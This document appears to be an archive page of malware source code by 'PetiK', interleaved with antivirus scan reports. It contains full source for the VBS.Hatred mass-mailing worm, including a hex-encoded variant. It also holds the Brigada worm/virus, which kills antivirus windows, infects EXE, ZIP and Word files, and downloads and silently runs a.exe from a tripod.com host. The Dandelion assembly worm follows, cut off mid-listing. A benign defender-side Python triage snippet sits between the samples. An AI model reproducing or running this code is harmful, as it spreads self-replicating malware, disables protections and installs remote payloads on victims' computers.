AVG                 8.5.0.336        2009.05.15
BitDefender         7.2              2009.05.16
CAT-QuickHeal       10.00            2009.05.15
ClamAV              0.94.1           2009.05.15
Comodo              1157             2009.05.08
DrWeb               5.0.0.12182      2009.05.16
eSafe               7.0.17.0         2009.05.14
eTrust-Vet          31.6.6508        2009.05.16
F-Prot              4.4.4.56         2009.05.15
F-Secure            8.0.14470.0      2009.05.15
Fortinet            3.117.0.0        2009.05.16
GData               19               2009.05.16
Ikarus              T3.1.1.49.0      2009.05.16
K7AntiVirus         7.10.735         2009.05.14
Kaspersky           7.0.0.125        2009.05.16
McAfee              5616             2009.05.15
McAfee+Artemis      5616             2009.05.15
McAfee-GW-Edition   6.7.6            2009.05.15
Microsoft           1.4602           2009.05.16
NOD32               4080             2009.05.15
Norman              6.01.05          2009.05.16
nProtect            2009.1.8.0       2009.05.16
Panda               10.0.0.14        2009.05.15
PCTools             4.4.2.0          2009.05.15
Prevx               3.0              2009.05.16
Rising              21.29.52.00      2009.05.16
Sophos              4.41.0           2009.05.16
Sunbelt             3.2.1858.2       2009.05.16
Symantec            1.4.4.12         2009.05.16
TheHacker           6.3.4.1.326      2009.05.15
TrendMicro          8.950.0.1092     2009.05.15
VBA32               3.12.10.5        2009.05.16
ViRobot             2009.5.15.1737   2009.05.15
VirusBuster         4.6.5.0          2009.05.15

Result: Worm.Win32.Petik!IK Win-Trojan/Dilna.5120 Worm/Petik.B2 Worm/Win32.Petik W32/Dilan.A Win32:Petik-B I-Worm/Petik.B Win32.Petik.J@mm Worm.Petik.b Worm.Petik.B Worm.Win32.Petik.AD Win32.Petik.20480 Win32.Petik.b Win32/Petik.5120.C W32/Dilan.A Worm.Win32.Petik.b W32/Petik.F Win32.Petik.J@mm Worm.Win32.Petik Worm.Win32.Petik.b Worm.Win32.Petik.b W32/PetTick.aj W32/PetTick.aj Worm.Petik.B2 Worm:Win32/Dilna.A Win32/Petik.AD W32/Pet_Tick.Int Worm Generic Worm.Petik Medium Risk Malware Worm.Win32.Petik.b W32/Dilna-A Worm.Win32.Petik.b W95.Pet_Tick.gen W32/Petik.b TROJ_DILNA.A Worm.Win32.Petik.b Worm.Win32.Petik.5120 I-Worm.Petdil.A

Additional information
File size: 5120 bytes
MD5...: e56a9313f5b25300de504cdce5c84bd8
SHA1..: 6901d7cc53cc5a3223fd9efe399082b119e80cf6
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian

' Name : VBS.Hatred
' Author : PetiK
' Language : VBS
' Date : 29/06/2002

On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") orig=WScript.ScriptFullName fcopy=fso.GetSpecialFolder(0) & "\LoveVSHatred.vbs" Call Copy(orig,fcopy) If orig=fcopy Then list(ws.SpecialFolders("MyDocuments")) list(fso.GetSpecialFolder(0)) Do Set out=CreateObject("Outlook.Application") Set map=out.GetNameSpace("MAPI") For each c In map.AddressLists If c.AddressEntries.Count <> 0 Then For d = 1 To c.AddressEntries.Count Set wpalr = out.CreateItem(0) wpalr.To = c.AddressEntries(d).Address wpalr.Subject = "Love or Hatred" wpalr.Body = "Open this file and choice..." wpalr.Attachments.Add(WScript.ScriptFullName) wpalr.DeleteAfterSubmit = True If wpalr.To <> "" Then wpalr.Send End If Next End If Next Loop End If Sub Copy(src,dst) fso.CopyFile orig,fcopy ws.RegWrite "HKLM\Software\Microsoft\Windows\Currentversion\Run\LVSH",fcopy End Sub Sub list(dir) For Each f1 In fso.GetFolder(dir).SubFolders infect(f1.Path) list(f1.Path) Next End Sub Sub infect(dir) For Each fil In fso.GetFolder(dir).Files ext = fso.GetExtensionName(fil.Path) ext = lCase(ext) If (ext = "htm") or (ext = "html") Then Set h=fso.OpenTextFile(fil.Path,1) scnm=h.ReadAll h.Close For j = 1 To Len(scnm) If Mid(scnm, j, 7) = "mailto:" Then mlto = "" cnt = 0 Do While Mid(scnm, j + 7 + cnt, 1) <> """" mlto = mlto + Mid(scnm, j + 7 + cnt, 1) cnt = cnt + 1 Loop SendMail(mlto) End If Next End If Next

End Sub Sub SendMail(email) On Error Resume Next Dim out Set out = CreateObject("Outlook.Application") Set mel = out.CreateItem(0) mel.To = email mel.Subject = "Love or Hatred ??" mel.Body = "Open this attached file and you will know if you have the love or the hatred" mel.Attachments.Add(WScript.ScriptFullName) mel.Attachments.Add (WScript.ScriptFullName) mel.Send Set out = Nothing End Sub Encrypted version On Error Resume Next Execute Q("4F6E204572726F7220526573756D65204E6...57874A456E6420537562") Function Q(swpe) For O=1 To Len(swpe) Step 2 Q=Q & Chr("&h" & Mid(swpe,O,2)) Next End Function 'Encrypt with the PetiK's VBS Hex Convert Tool

File Hatred.vbs received on 05.16.2009 17:42:47 (CET)

Antivirus           Version          Last Update
a-squared           4.0.0.101        2009.05.16
AhnLab-V3           5.0.0.2          2009.05.16
AntiVir             7.9.0.168        2009.05.15
Antiy-AVL           2.0.3.1          2009.05.15
Authentium          5.1.2.4          2009.05.16
Avast               4.8.1335.0       2009.05.15
AVG                 8.5.0.336        2009.05.15
BitDefender         7.2              2009.05.16
CAT-QuickHeal       10.00            2009.05.15
ClamAV              0.94.1           2009.05.16
Comodo              1157             2009.05.08
DrWeb               5.0.0.12182      2009.05.16
eSafe               7.0.17.0         2009.05.14
eTrust-Vet          31.6.6508        2009.05.16
F-Prot              4.4.4.56         2009.05.16
F-Secure            8.0.14470.0      2009.05.15
Fortinet            3.117.0.0        2009.05.16
GData               19               2009.05.16
Ikarus              T3.1.1.49.0      2009.05.16
K7AntiVirus         7.10.737         2009.05.16
Kaspersky           7.0.0.125        2009.05.16
McAfee              5616             2009.05.15
McAfee+Artemis      5616             2009.05.15
McAfee-GW-Edition   6.7.6            2009.05.15
Microsoft           1.4602           2009.05.16
NOD32               4080             2009.05.15
Norman              6.01.05          2009.05.16
nProtect            2009.1.8.0       2009.05.16
Panda               10.0.0.14        2009.05.16
PCTools             4.4.2.0          2009.05.16
Prevx               3.0              2009.05.16
Rising              21.29.52.00      2009.05.16
Sophos              4.41.0           2009.05.16
Sunbelt             3.2.1858.2       2009.05.16
Symantec            1.4.4.12         2009.05.16
TheHacker           6.3.4.1.326      2009.05.15
TrendMicro          8.950.0.1092     2009.05.15
VBA32               3.12.10.5        2009.05.16
ViRobot             2009.5.15.1737   2009.05.15
VirusBuster         4.6.5.0          2009.05.16

Result: Email-Worm.VBS.Lee.Based!IK VBS/Kristen Worm/Lee-based.3 Worm/VBS.VBS VBS/Kristen.G@mm VBS:VBSWG family@enc Worm/Generic_c.IH VBS.Hatred.A@mm VBS/Kristen.G Unclassified Malware VBS.Generic VBS/Kristen.G VBS/Kristen.G@mm Email-Worm.VBS.Lee-based VBS/Anjulie.C VBS.Hatred.A@mm Email-Worm.VBS.Lee.Based Email-Worm.VBS.Lee-based VBS/LoveLetter.gen VBS/LoveLetter.gen Worm.Lee-based.3 Virus:VBS/Leebased VBS/Lee-based VBS/Lee-based.U Worm Generic Virtool.Hex2VBS.A Worm.Mail.VBS.Lee-based.n VBS/Hatred-A VBS.LoveLetter.Var VBS/LoveLetter.gen VBS_ANJULIE.C Email-Worm.VBS.Lee-based Virtool.Hex2VBS.A

Additional information
File size: 4043 bytes
MD5...: 0917a7ca2afb01dc26afc99f642c0b6f
SHA1..: aa809d611ba4ba26e9c4d65aeba3239888a0da79

' Name : W32.HLLW.Brigada ' Author : PetiK & alc0paul ' Language : Visual Basic ' Date : 02/07/2002 ' ' ' ' Attribute VB_Name = "Module1" Option Explicit Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long) Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As Long, ByVal dwReserved As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const WM_CLOSE = &H10 Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Const EWX_SHUTDOWN = 1 Const CSIDL_PERSONAL = &H5 Const CSIDL_STARTUP = &H7 Const CSIDL_TIF = &H20 Const CSIDL_WIN = &H24 Const CSIDL_WINSYS = &H25 Const MAX_PATH = 260 
Private Type SHITEMID cb As Long abID As Byte End Type Private Type ITEMIDLIST mkid As SHITEMID End Type Sub Main() On Error Resume Next Dim vdir As String Dim lenhost As String Dim vc As String Dim mark As String Dim hostlen As String Dim virlen As String Dim buffhostlen As String Dim buffvirlen As String Call regcall Call killav vdir = App.path If Right(vdir, 1) <> "\" Then vdir = vdir & "\" FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WIN) & "\Ms0701i32.exe" FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe" '--------------- check if virus or worm -----------------------Open vdir & App.EXEName & ".exe" For Binary Access Read As #1 lenhost = (LOF(1)) vc = Space(lenhost) Get #1, , vc Close #1 mark = Right(vc, 2) If mark <> "b8" Then 'worm

Call extrkzip If InStr(1, GetCommLine, "-petikb8") = 0 Then Else Call wording Call zipinfect End If If InStr(1, GetCommLine, "-alcopaulb8") = 0 Then Else Call virustime End If If InStr(1, GetCommLine, "-trojanmode") = 0 Then Else ShutdownWindows EWX_SHUTDOWN End If listht GetSpecialfolder(CSIDL_TIF) Else 'virus : execute the host Open vdir & App.EXEName & ".exe" For Binary Access Read As #4 hostlen = (LOF(4) - 75264) virlen = (75264) 'worm/virus + zip component buffhostlen = Space(hostlen) buffvirlen = Space(virlen) Get #4, , buffvirlen Get #4, , buffhostlen Close #4 Open vdir & "XxX.exe" For Binary Access Write As #3 Put #3, , buffhostlen Close #3 'borrowed from murkry's vb5 virus idProg = Shell(vdir & "XxX.exe", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill vdir & "XxX.exe" End If '------------------------------------------------------------------Call downloader End Sub '---------------------- kill avs -------------------------------------Sub killav() On Error Resume Next Dim avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11, avn12 Dim aWindow As Long Dim angReturnValue As Long Dim num3, arrr3, av avn = "Pop3trap" avn1 = "JavaScan" avn2 = "Modem Booster" avn3 = "vettray" avn4 = "Timer" avn5 = "CD-Rom Monitor" avn6 = "F-STOPW Version 5.06c" avn7 = "PC-cillin 2000 : Virus Alert" avn8 = "DAPDownloadManager" avn9 = "Real-time Scan" avn10 = "IOMON98" avn11 = "AVP Monitor" avn12 = "NAI_VS_STAT" For num3 = 0 To 12 arrr3 = Array(avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11, avn12) av = arrr3(num3) aWindow = FindWindow(vbNullString, av) angReturnValue = PostMessage(aWindow, WM_CLOSE, vbNull, vbNull) Next num3 End Sub '-------------------------- download update and run it ---------------------Sub downloader() On Error Resume Next Dim databyte() As Byte If InternetGetConnectedState(0&, 0&) = 
0 Then GoTo xIt Form1.Inet1.RequestTimeout = 40 databyte() = Form1.Inet1.OpenURL("http://p0th0le.tripod.com/a.exe", icByteArray) Open "c:\update.exe" For Binary Access Write As #2 Put #2, , databyte()

Close #2 Shell "c:\update.exe", vbHide xIt: End Sub '----------------------c:\WINDOWS file infection---------------Sub virustime() On Error Resume Next Dim vdir As String Dim sfile As String Dim a As String Dim arr1 Dim lenhost As String Dim vc As String Dim mark As String Dim host vdir = App.path If Right(vdir, 1) <> "\" Then vdir = vdir & "\" sfile = dir$(GetSpecialfolder(CSIDL_WIN) & "\*.exe") While sfile <> "" a = a & sfile & "/" sfile = dir$ Wend arr1 = Split(a, "/") For Each host In arr1 Open GetSpecialfolder(CSIDL_WIN) & "\" & host For Binary Access Read As #1 lenhost = (LOF(1)) vc = Space(lenhost) Get #1, , vc Close #1 mark = Right(vc, 2) If mark <> "b8" Then GoTo notinfected Else GoTo gggoop End If notinfected: infect (GetSpecialfolder(CSIDL_WIN) & "\" & host) Exit For gggoop: Next host End Sub Function infect(hostpath As String) On Error Resume Next Dim ffile Dim hostcode As String Dim vir As String Dim vircode As String Dim header As String Dim f As String vir = App.path If Right(vir, 1) <> "\" Then vir = vir & "\" Open hostpath For Binary Access Read As #1 hostcode = Space(LOF(1)) Get #1, , hostcode Close #1 Open vir & App.EXEName & ".exe" For Binary Access Read As #2 header = Space(LOF(2)) Get #2, , header Close #2 f = "b8" Open hostpath For Binary Access Write As #3 Put #3, , header Put #3, , hostcode Put #3, , f Close #3 End Function '--------------------zip infection----------------------------Sub zipinfect() On Error Resume Next list ("c:\") End Sub Sub list(dir) On Error Resume Next Dim fso, ssf, fil Set fso = CreateObject("Scripting.FileSystemObject") Set ssf = fso.GetFolder(dir).SubFolders For Each fil In ssf

infection (fil.path) list (fil.path) Next End Sub Sub infection(dir) Dim fso, cf, fil, ext Set fso = CreateObject("Scripting.FileSystemObject") Set cf = fso.GetFolder(dir).Files For Each fil In cf ext = fso.GetExtensionName(fil.path) ext = LCase(ext) If (ext = "zip") Then Shell "c:\piss.exe " & fil.path & " " & GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe", vbHide End If Next End Sub '--------------------trojan mode payload----------------------------Sub ShutdownWindows(ByVal intParamater As Integer) Dim blnReturn As Boolean blnReturn = ExitWindowsEx(intParamater, 0) End Sub '--------------------variable commandline----------------------------Sub regcall() On Error Resume Next Dim b As String, c As String, d As String, ws As Object Dim regcol, final Set ws = CreateObject("WScript.Shell") b = "-alcopaulb8" c = "-petikb8" d = "-trojanmode" regcol = Array(b, c, d) Randomize final = regcol(Int(Rnd * 3)) ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\b8", GetSpecialfolder(CSIDL_WINSYS) & "\Ms0701i32.exe " & final If dir("c:\regedit.exe") <> "regedit.exe" Then FileCopy GetSpecialfolder(CSIDL_WIN) & "\regedit.exe", "c:\regedit.exe" End If End Sub '--------------------extract zip software----------------------------Sub extrkzip() On Error Resume Next Dim vdir As String Dim wormlen As String Dim rarlen As String Dim buffwormlen As String Dim buffrarlen As String vdir = App.path If Right(vdir, 1) <> "\" Then vdir = vdir & "\" Open vdir & App.EXEName & ".exe" For Binary Access Read As #1 wormlen = (LOF(1) - 63488) rarlen = (63488) buffwormlen = Space(wormlen) buffrarlen = Space(rarlen) Get #1, , buffwormlen Get #1, , buffrarlen Close #1 Open "c:\piss.exe" For Binary Access Write As #2 Put #2, , buffrarlen Close #2 Shell "c:\piss.exe c:\brigada8.zip " & vdir & App.EXEName & ".exe", vbHide End Sub '--------------------e-mail collect and e-mailing----------------------------Sub listht(dir) On Error Resume Next Dim fso, ssfh, filh Set fso = 
CreateObject("Scripting.FileSystemObject") Set ssfh = fso.GetFolder(dir).SubFolders For Each filh In ssfh infht (filh.path) listht (filh.path) Next End Sub Sub infht(dir)

Dim mlto As String Dim fso, cfh, filh, ext, textline, q Dim j As Long, cnt As Long Set fso = CreateObject("Scripting.FileSystemObject") Set cfh = fso.GetFolder(dir).Files For Each filh In cfh ext = fso.GetExtensionName(filh.path) ext = LCase(ext) If (ext = "htm") Or (ext = "html") Then Open filh.path For Input As #1 Do While Not EOF(1) Line Input #1, textline q = q & textline Loop Close #1 For j = 1 To Len(q) If Mid(q, j, 7) = "mailto:" Then mlto = "" cnt = 0 Do While Mid(q, j + 7 + cnt, 1) <> """" mlto = mlto + Mid(q, j + 7 + cnt, 1) cnt = cnt + 1 Loop Call Worming(mlto) End If Next End If Next End Sub Function Worming(mail As String) On Error Resume Next Dim a, b, c Set a = CreateObject("Outlook.Application") Set b = a.GetNameSpace("MAPI") If a = "Outlook" Then b.Logon "profile", "password" Set c = a.CreateItem(0) c.Recipients.Add mail c.Subject = "check us out" c.Body = "we exist to give everyone a smiley face... :)" c.Attachments.Add "c:\brigada8.zip" c.Send c.DeleteAfterSubmit = True b.Logoff End If End Function '--------------------commandline parser----------------------------Private Function GetCommLine() As String Dim RetStr As Long, SLen As Long Dim Buffer As String RetStr = GetCommandLine SLen = lstrlen(RetStr) If SLen > 0 Then GetCommLine = Space$(SLen) CopyMemory ByVal GetCommLine, ByVal RetStr, SLen End If End Function '--------------------get special folder----------------------------Private Function GetSpecialfolder(CSIDL As Long) As String Dim r As Long Dim IDL As ITEMIDLIST Dim path As String r = SHGetSpecialFolderLocation(100, CSIDL, IDL) If r = 0 Then path$ = Space$(512) r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal path$) GetSpecialfolder = Left$(path, InStr(path, Chr$(0)) - 1) Exit Function End If GetSpecialfolder = "" End Function '------------------ document infection --------------------------Sub wording() On Error Resume Next Dim vdir As String vdir = App.path If Right(vdir, 1) <> "\" Then vdir = vdir & "\" FileCopy vdir & App.EXEName & 
".exe", "c:\XXXview.exe"

Open "c:\v.r" For Output As #2 Print #2, "REGEDIT4" Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]" Print #2, """Level""=dword:00000001" Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]" Print #2, """Level""=dword:00000001" Print #2, """AccessVBOM""=dword:00000001" Close #2 Shell "c:\regedit.exe /s c:\v.r", vbHide Kill "c:\v.r" Open "c:\nl.tmp" For Output As #9 Print #9, "Sub document_close()" Print #9, "On Error Resume Next" Print #9, "Open ""c:\xp.exp"" For Output As 2" Print #9, "Print #2, ""sub document_open()""" Print #9, "Print #2, ""On Error Resume Next""" Print #9, "Print #2, ""jbo = ActiveDocument.Shapes(1).OLEFormat.ClassType""" Print #9, "Print #2, ""With ActiveDocument.Shapes(1).OLEFormat""" Print #9, "Print #2, "" .ActivateAs ClassType:=jbo""" Print #9, "Print #2, "" .Activate""" Print #9, "Print #2, ""End With""" Print #9, "Print #2, ""end sub""" Print #9, "Close 2" Print #9, "Set fso = CreateObject(""Scripting.FileSystemObject"")" Print #9, "Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule" Print #9, "Set iw = fso.OpenTextFile(""c:\xp.exp"", 1, True)" Print #9, "nt.DeleteLines 1, nt.CountOfLines" Print #9, "i = 1" Print #9, "Do While iw.atendofstream <> True" Print #9, "b = iw.readline" Print #9, "nt.InsertLines i, b" Print #9, "i = i + 1" Print #9, "Loop" Print #9, "ActiveDocument.Shapes.AddOLEObject _" Print #9, "FileName:=""c:\XXXview.exe"", _" Print #9, "LinkToFile:=False" Print #9, "ActiveDocument.Save" Print #9, "Open ""c:\b8.r"" For Output As #3" Print #9, "Print #3, ""REGEDIT4""" Print #9, "Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]""" Print #9, "Print #3, """"""Level""""=dword:00000001""" Print #9, "Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]""" Print #9, "Print #3, """"""Level""""=dword:00000001""" Print #9, "Print #3, """"""AccessVBOM""""=dword:00000001""" Print #9, "Close #3" Print #9, "Shell 
""c:\regedit.exe /s c:\b8.r"", vbHide" Print #9, "Kill ""c:\b8.r""" Print #9, "End Sub" Close #9 Open GetSpecialfolder(CSIDL_STARTUP) & "\startup.vbs" For Output As #6 Print #6, "On Error Resume Next" Print #6, "Set fso = CreateObject(""Scripting.FileSystemObject"")" Print #6, "Set oword = CreateObject(""Word.Application"")" Print #6, "oword.Visible = False" Print #6, "Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule" Print #6, "Set iw = fso.OpenTextFile(""c:\nl.tmp"", 1, True)" Print #6, "nt.DeleteLines 1, nt.CountOfLines" Print #6, "i = 1" Print #6, "Do While iw.atendofstream <> True" Print #6, "b = iw.readline" Print #6, "nt.InsertLines i, b" Print #6, "i = i + 1" Print #6, "Loop" Print #6, "oword.NormalTemplate.Save" Print #6, "oword.NormalTemplate.Close" Print #6, "oword.quit" Close #6 End Sub
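A defender-side triage routine for the prepender layout in the Brigada source above, added here as an example and not part of the archive or PetiK's code. It assumes only what the source states: infect() writes the worm body, then the original host, then the two bytes "b8"; the run-time branch splits at a fixed 75264-byte worm length; and virustime() skips any file whose last two bytes are "b8". The sample bytes are constructed.

```python
"""Triage for hosts touched by the Brigada.exe prepender.

Added example, not part of the archive. Layout assumed from the source:
infect() writes [worm body][original host][b"b8"], the run-time branch
splits at a fixed 75264-byte worm length (the same 75264 bytes reported
as the file size in the scan report), and virustime() skips any file
whose last two bytes are "b8". Sample bytes used below are constructed.
"""
from __future__ import annotations

WORM_LEN = 75264      # virlen / (LOF - 75264) in the source
MARKER = b"b8"        # trailer appended by infect(), tested by virustime()
MZ = b"MZ"            # DOS header signature every PE host starts with


def is_marked(data: bytes) -> bool:
    """True when the file ends with the worm's 2-byte re-infection marker."""
    return len(data) >= len(MARKER) and data.endswith(MARKER)


def split_prepended(data: bytes) -> tuple[bytes, bytes] | None:
    """Split a marked file into (worm_body, original_host).

    Returns None when the bytes do not fit the layout: missing marker, too
    short to hold a 75264-byte body plus a host, or either piece not
    starting with "MZ". The MZ checks matter because the marker alone is
    weak: any file that happens to end in the ASCII bytes "b8" passes it.
    """
    if not is_marked(data):
        return None
    if len(data) < WORM_LEN + len(MZ) + len(MARKER):
        return None
    body = data[:WORM_LEN]
    host = data[WORM_LEN:-len(MARKER)]
    if not (body.startswith(MZ) and host.startswith(MZ)):
        return None
    return body, host


def recover_host(data: bytes) -> bytes | None:
    """Original host bytes without the trailer, or None if not the layout.

    This differs from the worm's own run-time path on purpose: it copies
    LOF - 75264 bytes to XxX.exe, so the dropped copy still carries the
    2-byte "b8" trailer; here the trailer is stripped.
    """
    parts = split_prepended(data)
    return None if parts is None else parts[1]


if __name__ == "__main__":
    # Constructed sample: a zero-filled stand-in for the 75264-byte body,
    # a tiny fake host, and the trailer, in the order infect() writes them.
    fake_body = MZ + b"\x00" * (WORM_LEN - len(MZ))
    clean = MZ + b"constructed host program bytes"
    infected = fake_body + clean + MARKER
    print("clean file marked:    ", is_marked(clean))                  # False
    print("sample file marked:   ", is_marked(infected))               # True
    print("host recovered intact:", recover_host(infected) == clean)  # True
```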

File Brigada.exe received on 05.16.2009 11:20:53 (CET)

Antivirus (38 engines, in report order): a-squared, AhnLab-V3, AntiVir, Antiy-AVL, Authentium, Avast, AVG, BitDefender, CAT-QuickHeal, ClamAV, Comodo, DrWeb, eTrust-Vet, F-Prot, F-Secure, Fortinet, GData, Ikarus, K7AntiVirus, Kaspersky, McAfee, McAfee+Artemis, Microsoft, NOD32, Norman, nProtect, Panda, PCTools, Prevx, Rising, Sophos, Sunbelt, Symantec, TheHacker, TrendMicro, VBA32, ViRobot, VirusBuster

Version (same order): 4.0.0.101, 5.0.0.2, 7.9.0.168, 2.0.3.1, 5.1.2.4, 4.8.1335.0, 8.5.0.336, 7.2, 10.00, 0.94.1, 1157, 5.0.0.12182, 31.6.6508, 4.4.4.56, 8.0.14470.0, 3.117.0.0, 19, T3.1.1.49.0, 7.10.735, 7.0.0.125, 5616, 5616, 1.4602, 4080, 6.01.05, 2009.1.8.0, 10.0.0.14, 4.4.2.0, 3.0, 21.29.52.00, 4.41.0, 3.2.1858.2, 1.4.4.12, 6.3.4.1.326, 8.950.0.1092, 3.12.10.5, 2009.5.15.1737, 4.6.5.0

Last Update (same order): 2009.05.16, 2009.05.15, 2009.05.15, 2009.05.15, 2009.05.15, 2009.05.15, 2009.05.15, 2009.05.16, 2009.05.15, 2009.05.15, 2009.05.08, 2009.05.16, 2009.05.16, 2009.05.15, 2009.05.15, 2009.05.16, 2009.05.16, 2009.05.16, 2009.05.14, 2009.05.16, 2009.05.15, 2009.05.15, 2009.05.16, 2009.05.15, 2009.05.16, 2009.05.16, 2009.05.15, 2009.05.15, 2009.05.16, 2009.05.16, 2009.05.16, 2009.05.16, 2009.05.16, 2009.05.15, 2009.05.15, 2009.05.16, 2009.05.15, 2009.05.15

Result (36 detection names for 38 engines, so two engines returned an empty result; the flattened report does not show which two): Email-Worm.Win32.Alcaul!IK, Win32/CrazyBox.worm.75264, Worm/Alcaul.T1, Worm/Win32.Alcaul, W32/Malware!7ad5, Win32:Alcaul-AG, Win32/Alcarys, Win32.Alcaul.TB@mm, I-Worm.Alcaul.t, Worm.Petik-3, Worm.Win32.Petal.A, Win32.HLLM.Generic.64, Win32/Alcaul, W32/Malware!7ad5, Email-Worm.Win32.Alcaul.t, W32/Alcaul.T!worm, Win32.Alcaul.TB@mm, Email-Worm.Win32.Alcaul, Email-Worm.Win32.Alcaul.t, Email-Worm.Win32.Alcaul.t, W32/Alcop.ai@MM, W32/Alcop.ai@MM, Worm:Win32/Alcolita.A@mm, Win32/Petal.A, Alcaul.AZ@mm, Worm/W32.Alcaul.75264, Worm Generic.LC, Worm.Alcaul, High Risk Cloaked Malware, Worm.Mail.Alcaul.bl, W32/Alcaul-V, W32.Alcaul.Worm, W32.Alcaul.Worm, WORM_CRAZYBOX.A, Win32.HLLW.Alcaul.t, I-Worm.Alcop.CD

Additional information
File size: 75264 bytes
MD5...: 0a8cdb77f334f3f5d542509ed70ace70
SHA1..: 95e493da53b720985007df8f28817b94b7d9a902
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

comment # Name : I-Worm.Dandelion Author : PetiK Date : November 7th Size : 6144 byte Action: Copy itself to * WINDOWS\SYSTEM\Explor.exe Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value * MS Explor = WINDOWS\SYSTEM\Explor.exe In each run, it copies itself with a randome name on %windows% path. It record the name into the file "dandelion.txt" in the same folder. To delete the worm : Look at the file Del_Dandelion.vbs To built the worm : @echo off tasm32 /ml /m9 Dandelion tlink32 -Tpe -c -x -aa Dandelion,,,import32,dllz.def upx -9 Dandelion.exe if exist *.obj del *.obj if exist *.map del *.map Notes of the authors: # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm include useful.inc include myinclude.inc start: twin_worm: push mov push push api mov push push push api add mov stosd mov stosd mov stosd pop push push push api 50 esi,offset orig_worm esi 0 GetModuleFileNameA edi,offset copy_worm edi 50 edi GetSystemDirectoryA edi,eax eax,"pxE\" eax,".rol" eax,"exe" edi 0 edi esi CopyFileA ; edi =

; esi = name of file

; copy itself

push 9 push edi push 1 @pushsz "MS Explor" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"

push api end_twin: ; call call

80000002h SHSetValueA spread_computer htm_file 0 ExitProcess

; regedit

end_worm: push api

spread_computer proc pushad call generator_name mov edi,offset genname push push api push api push push push api 50 offset windir GetWindowsDirectoryA offset windir SetCurrentDirectoryA 0 edi offset orig_worm CopyFileA

@pushsz "dandelion.txt" @pushsz "A New Copy Of Worm.Dandelion" push edi @pushsz "Copy Of Worm" api WritePrivateProfileStringA end_spread_computer: popad ret generator_name: mov edi,offset genname api GetTickCount push 9 pop ecx xor edx,edx div ecx inc edx mov ecx,edx gen_name: push ecx api GetTickCount push 'Z'-'A' pop ecx xor edx,edx div ecx xchg eax,edx add al,'A' stosb api GetTickCount push 100 pop ecx xor edx,edx div ecx push edx api Sleep pop ecx loop gen_name mov eax,'exe.' stosd ret spread_computer endp htm_file proc pushad mov edi,offset ptkdir push edi push 50 push edi api GetSystemDirectoryA

add edi,eax mov eax,"glP\" stosd mov eax,"KTP_" stosd pop edi push edi api CreateDirectoryA push edi api SetCurrentDirectoryA create_htm: @pushsz "\WinPatch.htm" push offset ptkdir api lstrcat push 0 push 80h push 2 push 0 push 1 push 40000000h push offset ptkdir api CreateFileA mov [hHTM],eax push 0 push offset byte push e_htm - s_htm push offset s_htm push [hHTM] api WriteFile push [hHTM] api CloseHandle end_htm_file: popad ret htm_file endp .data ; === copy_worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) ; === spread_computer === windir db 50 dup (0) genname db 15 dup (?) ; === htm_file === ptkdir db 50 dup (0) hHTM dd ? byte dd ? s_htm: db '<HTML><HEAD><TITLE>Windows98</TITLE></HEAD>',CRLF db '<BODY TEXT=yellow LINK=red VLINK=red BGCOLOR="#000080">',CRLF db '<P ALIGN="RIGHT">',CRLF db '<A HREF="http://www.microsoft.com/isapi/redir.dll?' db 'prd=windows98&clcid=&pver=4.10&ar=wallpaper">',CRLF db '<IMG SRC="res://membg.dll/membg.gif" BORDER=0 WIDTH=329 HEIGHT=47></A>&nbsp;' db '</P>',CRLF db '</BODY>',CRLF db '<P ALIGN="CENTER">',CRLF db '<script language=vbscript>',CRLF db 'on error resume next',CRLF db 'set fso=createobject("scripting.filesystemobject")',CRLF db 'if err.number=429 then',CRLF db 